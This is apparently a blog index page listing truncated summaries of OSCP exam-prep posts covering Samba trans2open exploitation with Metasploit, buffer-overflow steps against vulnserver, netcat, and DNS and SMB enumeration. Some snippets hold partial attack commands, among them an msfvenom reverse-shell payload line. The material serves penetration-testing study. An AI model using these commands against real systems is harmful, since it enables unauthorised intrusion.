上一页 1 ··· 7 8 9 10 11 12 13 14 15 ··· 57 下一页
摘要: OSCP Security Technology - Gaining Root with Metasploit Analysis nmap scanning result. searchsploit samba 2.2 msfconsole search trans2open use exploit 阅读全文
posted @ 2021-07-07 08:21 晨风_Eric 阅读(36) 评论(0) 推荐(0)
摘要: OSCP Security Technology - Generating Shellcode& Gaining Root Generating shellcode.(Note: LHOST is Kali Linux's IP) msfvenom -p windows/shell_reverse_ 阅读全文
posted @ 2021-06-27 20:29 晨风_Eric 阅读(61) 评论(0) 推荐(0)
摘要: OSCP Security Technology - Finding the Right Module Download Mona module and set immunity debugger configuration. https://github.com/corelan/mona Open 阅读全文
posted @ 2021-06-27 19:44 晨风_Eric 阅读(59) 评论(0) 推荐(0)
摘要: OSCP Security Technology - Finding Bad Characters Finding bad characters with immunity debugger. nano badchars.py chmod 777 badchars.py #!/usr/bin/pyt 阅读全文
posted @ 2021-06-27 18:55 晨风_Eric 阅读(111) 评论(0) 推荐(0)
摘要: OSCP Security Technology - Finding the Offset Create and copy pattern. /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 5900 Create 阅读全文
posted @ 2021-06-26 23:54 晨风_Eric 阅读(285) 评论(0) 推荐(0)
摘要: OSCP Security Technology - Fuzzing Download vulnserver from the grey corner website. https://thegreycorner.com/vulnserver.html Download immunity debug 阅读全文
posted @ 2021-06-26 23:04 晨风_Eric 阅读(67) 评论(0) 推荐(0)
摘要: OSCP Security Technology - Buffer Overflows Anatomy of Memory Anatomy of the Stack 阅读全文
posted @ 2021-06-19 21:06 晨风_Eric 阅读(49) 评论(0) 推荐(0)
摘要: OSCP Security Technology - Netcat Netcat Download Netcat for windows from following website. https://eternallybored.org/misc/netcat/ nc -nv 192.168.2. 阅读全文
posted @ 2021-06-19 20:42 晨风_Eric 阅读(60) 评论(0) 推荐(0)
摘要: OSCP Security Technology - Enumeration(3) DNS Enumeration host -t ns zonetransfer.me host -t mx zonetransfer.me host zonetransfer.me host -l zonetrans 阅读全文
posted @ 2021-06-19 14:24 晨风_Eric 阅读(174) 评论(0) 推荐(0)
摘要: OSCP Security Technology - Enumeration(2) SMB Enumeration We found the tcp port 111 is open from the scanning result. locate smb.conf nano /etc/samba/ 阅读全文
posted @ 2021-06-19 13:46 晨风_Eric 阅读(211) 评论(0) 推荐(0)
上一页 1 ··· 7 8 9 10 11 12 13 14 15 ··· 57 下一页